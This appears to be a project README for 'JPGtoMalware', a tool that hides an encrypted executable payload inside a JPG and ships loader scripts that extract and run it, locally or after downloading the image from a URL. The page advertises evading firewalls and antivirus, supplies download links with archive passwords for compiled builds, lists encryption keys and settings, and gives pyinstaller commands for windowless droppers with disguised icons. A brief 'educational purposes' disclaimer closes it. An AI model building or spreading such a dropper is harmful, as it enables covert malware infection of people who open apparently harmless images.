JPGtoMalware

It embeds the executable file or payload inside the jpg file. The method the program uses isn’t exactly called one of the steganography methods [secure cover selection, least significant bit, palette-based technique, etc ]. For this reason, it does not cause any distortion in the JPG file. The JPG file size and payload do not have to be proportional.The JPG file is displayed normally in any viewing application or web application. It can bypass various security programs such as firewall, antivirus. If the file is examined in detail, it is easier to detect than steganography methods.However, since the payload in the JPG file is encrypted, it cannot be easily decrypted. It also uses the “garbage code insertion/dead-code insertion” method to prevent the payload from being caught by the antivirus at runtime.

File(s)

1) InjectingMalwareIntoJPG.py : It is the script that embeds the payload into the JPG file.

2) malware_v1.py : It is the script that extracts the malware in the existing image file and runs it. The malware loaded JPG file must be in the same folder. (Default JPG Name : “malwareJPG.jpg”)

3) malware_v2.py : It is the script that extracts the malware in the JPG file downloaded from the internet and runs it. (Default Url : “https://raw.githubusercontent.com/abdulkadir-gungor/JPGtoMalware/main/.image/malwareJPG.jpg“) (After the script code is compiled, the values of the variables can be seen with the static analysis of the program.)

4) malware_v3.py : It is the script that extracts the malware in the JPG file downloaded from the internet and runs it. (Default Url : “https://raw.githubusercontent.com/abdulkadir-gungor/JPGtoMalware/main/.image/malwareJPG.jpg“) (After the script code is compiled, the values of the variables can be seen with dynamic analysis of the program.)

The Compiled Version of the Program Can be Downloaded from the Links Below.

screenshot_1

“Injecting Malware Into JPG File”
InjectingMalwareIntoJPG.rar –> zip password: “gungorX”
Link = https://drive.google.com/file/d/1ENt-d0q-Yv-4mZALiUwqvZtp23JH415s/view?usp=sharing
“Malware V1”
malware_v1.rar –> zip password: “gungorX”
Link = https://drive.google.com/file/d/1kG2O2pKYxHz03zWpmywA-9CluSP7Orav/view?usp=sharing
“Malware V2”
malware_v2.rar –> zip password: “gungorX”
Link = https://drive.google.com/file/d/1yxvb3BjH3Xi3vbE7VTyBDeWGhr8v3cSX/view?usp=sharing
“Malware V3”
malware_v3.rar –> zip password: “gungorX”
Link = https://drive.google.com/file/d/1f_JQSrKTknlTg31rDeKOF3NpAVN9NO3C/view?usp=sharing

Requirements

Required libraries: colorama, cryptography, requests, pyinstaller

pip install colorama
pip install cryptography
pip install requests
pip install pyinstaller

“pyinstaller” will be used to make the code one piece executable

Settings

InjectingMalwareIntoJPG.py (Default Settings)

class SETTINGS():
    PROGRAM_NAME = "Injecting Malware Into JPG"         # Program Name
    JPG_FILE = 'linux.jpg'                              # Jpg file name      # The variable is changed again during the program run.
    EXE_FILE = "malware.exe"                            # Malware file name  # The variable is changed again during the program run.
    OUT_FILE = "malwareJPG.jpg"                         # Out file name
    PUPLIC_KEY = b'!AbdUlkadiR%+39608]gunGor[{'         # Encryption key
    PRIVATE_NUMBER = 19                                 # Encryption number
    BUFFER     = 1024                                   # Buffer for memory optimization
    FILL_SIZE  = 1073741824  # 1024x1024x1024 (1 GB)    # The size to increase the size of the executable file.
    WAIT_TIME  = 0.1                                    # Waiting time between processes

malware_v1.py (Default Settings)

class SETTINGS():
    JPG_NAME = 'malwareJPG.jpg'                       # Jpg file name
    OUT_FILE = "malware_test.exe"                     # (to be created) Malware file name
    PUPLIC_KEY = b'!AbdUlkadiR%+39608]gunGor[{'       # Encryption key
    PRIVATE_NUMBER = 19                               # Encryption number
    BUFFER     = 1024                                 # Buffer for memory optimization
    WAIT_TIME  = 0.1                                  # Waiting time between processes

malware_v2.py (Default Settings)

class SETTINGS():
    URL_ADDR = "https://raw.githubusercontent.com/abdulkadir-gungor/JPGtoMalware/main/.image/malwareJPG.jpg"  # url where the image is located
    OUT_FILE = "malware_test.exe"                       # (to be created) Malware file name
    PUPLIC_KEY = b'!AbdUlkadiR%+39608]gunGor[{'         # Encryption key
    PRIVATE_NUMBER = 19                                 # Encryption number
    JPG_NAME  = 'malware_attack.jpg'                    # Jpg file name
    BUFFER     = 1024                                   # Buffer for memory optimization
    WAIT_TIME  = 0.1                                    # Waiting time between processes

malware_v3.py (Default Settings)

# Encrypted data for static analysis
# However, variables can be resolved with dynamic analysis.
class SETTINGS():
    KEY      = b'w3F4q2qyPG6WGHMwG6TrYq2R_ih9-_XTYH0H89J7UMk='
    URL_ADDR = b'gAAAAABiinQIPIhKqfLYaKt76lRXeboIJfCDr0NGsGROzSLe3ndeSo9RxM-EXNzsxFjwC-sU3axowzYaZCgsSfMl4qe4rWGaLbmNY0zD6_S34lOO10a_idkEQpfVSld0BSM7Yd4LXpgH6Fvkuw36QVlzmI_NvQJ6v5_mgEmCIzhSbiuMHJ-p9hdj28-2cMRa1BcFWZBbbRe7'
    OUT_FILE = b'gAAAAABiinRLcZh6qJ959Mzqup5ZLOnGwAQBAFPXD6hebpSpI4u3M24Npi3lIbTjW5ImEYwiz6WfD8JOyrcDzjR5gpTun4pI0gPHjf-xi_LSboOy5B7hwXo='
    PUPLIC_KEY = b'rt!1AtbydmUklvkaapdli+R)%=+4359?6#0!8-][gGu1nFGqoQrP[-{!Ue&&QcVb09@'
    PRIVATE_NUMBER = 4
    JPG_NAME  = b'gAAAAABiinSMlx2n6LSUzHfrET4UDnv_Fy7lc7h9zAKsC6p9ulM56yW0nXarAWvU2nmZqdNscglA9MLr2P3p20ADC3CWZsul4-YnfDiIFl13tZUnZ_BdDRU='
    BUFFER     = 1024
    WAIT_TIME  = 0.1

Compilation

[Language : Python 3.8.5]

# [Program that produces jpg with malware]
pyinstaller --onefile  --icon=InjectingMalwareIntoJPG.ico InjectingMalwareIntoJPG.py

# [Malware(s)]
pyinstaller --onefile  --noconsole  --icon=malware.ico  malware_v1.py
pyinstaller --onefile  --noconsole  --icon=malware.ico  malware_v2.py
pyinstaller --onefile  --noconsole  --icon=malware.ico  malware_v3.py

Some Screenshot of the Working of the Program

Screenshot [1] (InjectingMalwareIntoJPG.exe)

screenshot_2

Screenshot [2] (InjectingMalwareIntoJPG.exe)

screenshot_3

Screenshot [3] (malware_v1.exe)

screenshot_4

Screenshot [4] (malware_v1.exe)

screenshot_5

Screenshot [5] (malware_v2.exe)

screenshot_7

Screenshot [6] (malware_v3.exe)

screenshot_9

Legal Warning

Run your tests on virtual machines. The responsibility for illegal use belongs to the user. Shared for educational purposes.

GitHub

View Github